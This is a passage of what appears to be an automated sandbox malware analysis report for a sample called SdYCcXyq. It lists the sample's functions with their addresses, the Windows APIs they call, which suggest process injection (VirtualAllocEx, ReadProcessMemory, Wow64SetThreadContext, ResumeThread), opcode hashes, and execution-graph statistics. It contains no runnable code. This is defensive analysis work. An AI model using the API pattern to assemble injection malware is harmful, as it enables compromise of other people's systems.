                                                                                            • Instruction ID: c3c9295ee8e648f3752751db25a46fd614c47db3ba8c1a39d5b0c543cf845108
                                                                                            • Opcode Fuzzy Hash: 65ca3a5165641f2fdd70f700d0399f831cf4a82d01b61408b31f7bc93608b4d3
                                                                                            • Instruction Fuzzy Hash: C42127B1D003599FCB10CFA9C985BDEBBF5FF48320F10842AE959A7250C7789944CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 06FCBC88 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 749 6fcbc88-6fcbcdb 752 6fcbcdd-6fcbce9 749->752 753 6fcbceb-6fcbd1b Wow64SetThreadContext 749->753 752->753 755 6fcbd1d-6fcbd23 753->755 756 6fcbd24-6fcbd54 753->756 755->756
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06FCBD0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: 52fbe7004e143d496268095040d4ba56b6811bd6fe4f06c2bda424140a685cc6
                                                                                            • Instruction ID: b8758c97eebcd9793fccb00f0f6809094b898d30aad31f999cdd2ef487fb6771
                                                                                            • Opcode Fuzzy Hash: 52fbe7004e143d496268095040d4ba56b6811bd6fe4f06c2bda424140a685cc6
                                                                                            • Instruction Fuzzy Hash: CE2139B5D002098FDB10DFAAC5857EEBBF5EF48324F10842ED459A7240CB789985CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 06FCC34A Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06FCC3D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: 81211bf687cf45839edb1eb79bf6a8a8d1a6794ad50690e6e782cd2c7d006248
                                                                                            • Instruction ID: 4fa0b2314afe996b3f38def7adac2f132b3690295c5c13f2ee2bbe5b922cc504
                                                                                            • Opcode Fuzzy Hash: 81211bf687cf45839edb1eb79bf6a8a8d1a6794ad50690e6e782cd2c7d006248
                                                                                            • Instruction Fuzzy Hash: C92126B19002599FCB10DFAAD881ADEBBF5BF48320F10842DE558A7250C7749954CBA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 06FCBBDA Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: f4cdf52568d83f520a346eca0a09bcc96d4d492a7e5d45de4dc5068505d29053
                                                                                            • Instruction ID: 36cebaa39a7545b4911910ef8e31b97e82e15ed1e2f9816577e98c92ed1c7046
                                                                                            • Opcode Fuzzy Hash: f4cdf52568d83f520a346eca0a09bcc96d4d492a7e5d45de4dc5068505d29053
                                                                                            • Instruction Fuzzy Hash: 45215BB5D002498BCB10DFA9D9457EEFBF5EF88224F20845AD419A7250CB34A944CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 06FCC350 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06FCC3D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: 41ee275227c3905628c41837005f208ad66e36fce8962e1726d1a150ff0ca233
                                                                                            • Instruction ID: 508833269d58bfeeccfc336b47cffa715141c85f6f5c6f0ff6f067c9a2f26080
                                                                                            • Opcode Fuzzy Hash: 41ee275227c3905628c41837005f208ad66e36fce8962e1726d1a150ff0ca233
                                                                                            • Instruction Fuzzy Hash: BB2125B1D002599FCB10DFAAC885AEEFBF5FF48320F10842EE558A7250C7789944CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 06FCBC90 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06FCBD0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: 47931cf2bb2dad30446ba5ccd89037d8edf7bab5853dab966c394a479434f243
                                                                                            • Instruction ID: 190935dc3f6bf2965d6765fa5af08ee31f8acceb041aad7d3978cd6dde4a8178
                                                                                            • Opcode Fuzzy Hash: 47931cf2bb2dad30446ba5ccd89037d8edf7bab5853dab966c394a479434f243
                                                                                            • Instruction Fuzzy Hash: D62138B1D002098FDB10DFAAC5857EEBBF4EF48324F10842DD459A7240CB789944CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00DAD358 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DAD3E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 6ee8bb49113ee7779ef903d18d1bc54f80184742bc7c5196ae4c8259198a9344
                                                                                            • Instruction ID: dcdd5f4a6f2fe90d48bfaccf86291452150056b0f2e43efcfbbafd84240a51e5
                                                                                            • Opcode Fuzzy Hash: 6ee8bb49113ee7779ef903d18d1bc54f80184742bc7c5196ae4c8259198a9344
                                                                                            • Instruction Fuzzy Hash: F82100B59002199FDB10CFAAD584ADEBBF5EF48324F14841AE819B3310C378A954CF60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00DAD360 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DAD3E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 008ca495d29e01fa7edbde1d5ec398dc8ad1d52b5a5f8c41b41d376834327fc1
                                                                                            • Instruction ID: 2fd8382cf7e42bc02f66b0326f66f6f40691e3e89cbfbd0bec76249744e62d3b
                                                                                            • Opcode Fuzzy Hash: 008ca495d29e01fa7edbde1d5ec398dc8ad1d52b5a5f8c41b41d376834327fc1
                                                                                            • Instruction Fuzzy Hash: 1821E4B59002189FDB10CF9AD584ADEBFF9EB48320F14841AE914A7350C374A944CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 06FCC198 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06FCC20E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: fde73cffe31ffff76c362d79616b1794e9aaadb0c7dfe2ee9d4981f6db982718
                                                                                            • Instruction ID: 0b26890563b9ce17876d8cb89b30d43498a66a72080298dd44113073baa0425d
                                                                                            • Opcode Fuzzy Hash: fde73cffe31ffff76c362d79616b1794e9aaadb0c7dfe2ee9d4981f6db982718
                                                                                            • Instruction Fuzzy Hash: 521159718002499FCB10DFAAD844ADFFFF5EF88324F108419E559A7250C7799544CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00DAA8D0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00DAB161,00000800,00000000,00000000), ref: 00DAB372
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 09a53ac0a0aa9d2b94c3c2937a4c9daec2277b14018730533076c2e9002e8492
                                                                                            • Instruction ID: 00a65c77515ad9a99cfc093b287bc551892f55b84176df09e35689dad7717d6b
                                                                                            • Opcode Fuzzy Hash: 09a53ac0a0aa9d2b94c3c2937a4c9daec2277b14018730533076c2e9002e8492
                                                                                            • Instruction Fuzzy Hash: EA1112B69003089FCB10CF9AD448ADEFBF4EF49320F14842AE459A7211C3B5A945CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 06FCC1A0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06FCC20E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 90aa89fa41146c49c7851ebe419d3c03e610195f4be4de6288c54329aa60fc55
                                                                                            • Instruction ID: 04947defa79414358faa24989610a4e56d11e8a92cb78c8adf4fd14e02cfb2e4
                                                                                            • Opcode Fuzzy Hash: 90aa89fa41146c49c7851ebe419d3c03e610195f4be4de6288c54329aa60fc55
                                                                                            • Instruction Fuzzy Hash: 651137B29002499FCB10DFAAC844BDEFFF5EF88324F108819E559A7250C775A944CFA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00DAB300 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00DAB161,00000800,00000000,00000000), ref: 00DAB372
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 75288db0e10ba1b4767985d54891817f7218d90c508fc3983f14d93fdac972aa
                                                                                            • Instruction ID: c96294847fd2ce406e5f7613f7a85188c36bdb074c66a475b86f1e474c866eff
                                                                                            • Opcode Fuzzy Hash: 75288db0e10ba1b4767985d54891817f7218d90c508fc3983f14d93fdac972aa
                                                                                            • Instruction Fuzzy Hash: 8C1114B6D002499FDB10CF9AD448ADEFBF4EB48320F14852AD419A7210C375A545CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 06FCBBE0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: 42ce5f92b08a7c945ae0295fd2822679f4b2f71656b700ebb29b61dd13925658
                                                                                            • Instruction ID: 33d4822c8ab9605fc78d417b9efd5a1ca40f5341feec4dbc7d360012101015ae
                                                                                            • Opcode Fuzzy Hash: 42ce5f92b08a7c945ae0295fd2822679f4b2f71656b700ebb29b61dd13925658
                                                                                            • Instruction Fuzzy Hash: 4B1136B1D002498FCB20DFAAC5457EEFBF4EF88324F208429D559A7250CB79A944CFA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 06FCA720 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06FCF5C5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost
                                                                                            • String ID:
                                                                                            • API String ID: 410705778-0
                                                                                            • Opcode ID: 40233c32e607de6bf722e5bb7d70a8f9bab769a8a50996ea19cfed8b8d9a1061
                                                                                            • Instruction ID: 1073253ac9a1254ddd1352c2cfe1e35cf9f8ca52617b67d82cc9b955cc5f1833
                                                                                            • Opcode Fuzzy Hash: 40233c32e607de6bf722e5bb7d70a8f9bab769a8a50996ea19cfed8b8d9a1061
                                                                                            • Instruction Fuzzy Hash: 9311F2B58003499FDB10DF9AD948BDEFBF8EF48324F10885AE558A7600C375A944CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 06FCF563 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06FCF5C5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost
                                                                                            • String ID:
                                                                                            • API String ID: 410705778-0
                                                                                            • Opcode ID: ae92e6dd5b6f3a9e5b9f2897efe16d66641384515815ad2331cca1cb73b73ee3
                                                                                            • Instruction ID: 975214cf6f489703fbb7c42bd687adb2394297b38f6eed5ba1c2abf30bb1807b
                                                                                            • Opcode Fuzzy Hash: ae92e6dd5b6f3a9e5b9f2897efe16d66641384515815ad2331cca1cb73b73ee3
                                                                                            • Instruction Fuzzy Hash: B81122B58002499FCB10CF9AD945BDEFFF8EB48324F10881AE558A7200C374A584CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00DAB080 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00DAB0E6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 7be66bbe36028269eb3e8e199dec84b8d5287b5f0e654635553e797ee55e2ffc
                                                                                            • Instruction ID: 8fe1154cd98226ccb582363a7366b4007472594b4f1da523d299532692c6168f
                                                                                            • Opcode Fuzzy Hash: 7be66bbe36028269eb3e8e199dec84b8d5287b5f0e654635553e797ee55e2ffc
                                                                                            • Instruction Fuzzy Hash: F0110FB6C003498FCB20CF9AD444ADEFBF4AF8A324F14842AD428B7210C379A545CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 09740910 Relevance: .1, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1746307858.0000000009740000.00000040.00000800.00020000.00000000.sdmp, Offset: 09740000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_9740000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 138a7db30eeef17b2c104d79e17764d97db0654acf73e5722d16eb53b017a93f
                                                                                            • Instruction ID: 92cacb0415cb1b482d199319934b7018f8256c6cbca9dfba345f57466fb3f0b7
                                                                                            • Opcode Fuzzy Hash: 138a7db30eeef17b2c104d79e17764d97db0654acf73e5722d16eb53b017a93f
                                                                                            • Instruction Fuzzy Hash: A031A236909260CFE7248B24C8557797BE0AF45309F05849FF2ADCA593C3759856CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00D3D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738133105.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_d3d000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1315d6cf0cebaa13430a5277cf5c7b31905a93ac2f4431c3c03ea8afc6a5ee11
                                                                                            • Instruction ID: 2ed555a64fa1723420ebd327a6cfa17d01f37d59cdef55976a5cd8886c0220ef
                                                                                            • Opcode Fuzzy Hash: 1315d6cf0cebaa13430a5277cf5c7b31905a93ac2f4431c3c03ea8afc6a5ee11
                                                                                            • Instruction Fuzzy Hash: 4B213771504204DFDB05DF14E9C0B26BF66FB98324F24C169E9494B25AC336E856CFB2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00D4D01C Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738257058.0000000000D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_d4d000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b7874e9704090ee56a9e5c7c38025305e3de0214544ea7ad2b577f5468bb807b
                                                                                            • Instruction ID: ad0ee34cf5a9ba9794cef7341b29f796993442a603e3a3a6429d3bfb5ffb6445
                                                                                            • Opcode Fuzzy Hash: b7874e9704090ee56a9e5c7c38025305e3de0214544ea7ad2b577f5468bb807b
                                                                                            • Instruction Fuzzy Hash: 3C21FF71604240DFCB14DF24D984B26BBA6EB88314F24C5ADE84A4B296C33AD847CA71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00D4D005 Relevance: .1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738257058.0000000000D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_d4d000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 135791ffac49803174b0ed8818ca6ea7885baf5fbf6087359f5d7d206852e5b6
                                                                                            • Instruction ID: 72f554617cd52018d89bfd436ff8c154a9d50b1680773de17686cbf8faee5e0c
                                                                                            • Opcode Fuzzy Hash: 135791ffac49803174b0ed8818ca6ea7885baf5fbf6087359f5d7d206852e5b6
                                                                                            • Instruction Fuzzy Hash: AE218E755093C08FCB02CF24D994715BF72EB46314F28C5EAD8498F2A7C33A980ACB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00D3D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738133105.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_d3d000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                            • Instruction ID: fdd686fe210f0c3a74e795e4a9a35d95016ff8c05cb3db716288b13dc3068fc5
                                                                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                            • Instruction Fuzzy Hash: EF110372404240CFCB02CF10E9C4B16BF72FB94324F28C2A9D8090B256C33AE85ACFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 09740901 Relevance: .1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1746307858.0000000009740000.00000040.00000800.00020000.00000000.sdmp, Offset: 09740000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_9740000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c5d95257790b848d91fad9d01b661d2d9028815c7f842eb6e58a00430cf72168
                                                                                            • Instruction ID: 82324b1abff3c1a6da59e253ffacda1036f508672f55c02743435905a468d36e
                                                                                            • Opcode Fuzzy Hash: c5d95257790b848d91fad9d01b661d2d9028815c7f842eb6e58a00430cf72168
                                                                                            • Instruction Fuzzy Hash: 89112937608652CFEB108B28E844778BBE1BF45316F09856BE2A9CB2D3C378C855CB11
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00D3D731 Relevance: .0, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738133105.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_d3d000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e7824ef040141988132e3ef5a40ca4559899b2e40326e76090d85b1aeff43627
                                                                                            • Instruction ID: 0c815ca4a360b01ed5c564dbb38f70e364ad1aba9288a69d0f314107b338a568
                                                                                            • Opcode Fuzzy Hash: e7824ef040141988132e3ef5a40ca4559899b2e40326e76090d85b1aeff43627
                                                                                            • Instruction Fuzzy Hash: 24012BB10083049AE7104A25DDC4767FFD9EF40325F2CC52AEC4A4A292C378DC40CE71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00D3D730 Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738133105.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_d3d000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 714138e49632d9c3227e616384d423bf6bf89e6dbe12aae42c5ef3d1fab1f14a
                                                                                            • Instruction ID: 9774c7de16d527c23f43ce5f32883f9712cbf090d4e9a737bfeb416ccc799eb9
                                                                                            • Opcode Fuzzy Hash: 714138e49632d9c3227e616384d423bf6bf89e6dbe12aae42c5ef3d1fab1f14a
                                                                                            • Instruction Fuzzy Hash: 8EF0C2710043449AE7108A16D884B66FFA8EF90734F18C55AED091E282C2799844CA70
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Execution Graph

                                                                                            Execution Coverage:3%
                                                                                            Dynamic/Decrypted Code Coverage:14.4%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:630
                                                                                            Total number of Limit Nodes:72
                                                                                            execution_graph 44801 41f0f0 44804 41b970 44801->44804 44805 41b996 44804->44805 44812 409d40 44805->44812 44807 41b9a2 44808 41b9c3 44807->44808 44820 40c1c0 44807->44820 44810 41b9b5 44856 41a6b0 44810->44856 44859 409c90 44812->44859 44814 409d4d 44815 409d54 44814->44815 44871 409c30 44814->44871 44815->44807 44821 40c1e5 44820->44821 45290 40b1c0 44821->45290 44823 40c23c 45294 40ae40 44823->45294 44825 40c4b3 44825->44810 44826 40c262 44826->44825 45303 4143a0 44826->45303 44828 40c2a7 44828->44825 45306 408a60 44828->45306 44830 40c2eb 44830->44825 45313 41a500 44830->45313 44834 40c341 44835 40c348 44834->44835 45323 41a010 44834->45323 44836 41bdc0 2 API calls 44835->44836 44838 40c355 44836->44838 44838->44810 44840 40c392 44841 41bdc0 2 API calls 44840->44841 44842 40c399 44841->44842 44842->44810 44843 40c3a2 44844 40f4a0 3 API calls 44843->44844 44845 40c416 44844->44845 44845->44835 44846 40c421 44845->44846 44847 41bdc0 2 API calls 44846->44847 44848 40c445 44847->44848 45328 41a060 44848->45328 44851 41a010 2 API calls 44852 40c480 44851->44852 44852->44825 45333 419e20 44852->45333 44855 41a6b0 2 API calls 44855->44825 44857 41af60 LdrLoadDll 44856->44857 44858 41a6cf ExitProcess 44857->44858 44858->44808 44890 418bc0 44859->44890 44863 409cb6 44863->44814 44864 409cac 44864->44863 44897 41b2b0 44864->44897 44866 409cf3 44866->44863 44908 409ab0 44866->44908 44868 409d13 44914 409620 LdrLoadDll 44868->44914 44870 409d25 44870->44814 44872 409c4a 44871->44872 44873 41b5a0 LdrLoadDll 44871->44873 45265 41b5a0 44872->45265 44873->44872 44876 41b5a0 LdrLoadDll 44877 409c71 44876->44877 44878 40f180 44877->44878 44879 40f199 44878->44879 45273 40b040 44879->45273 44881 40f1ac 45277 41a1e0 44881->45277 44884 409d65 44884->44807 44886 40f1d2 44887 40f1fd 44886->44887 45283 41a260 44886->45283 44889 41a490 2 API calls 44887->44889 44889->44884 44891 418bcf 44890->44891 44915 414e50 44891->44915 44893 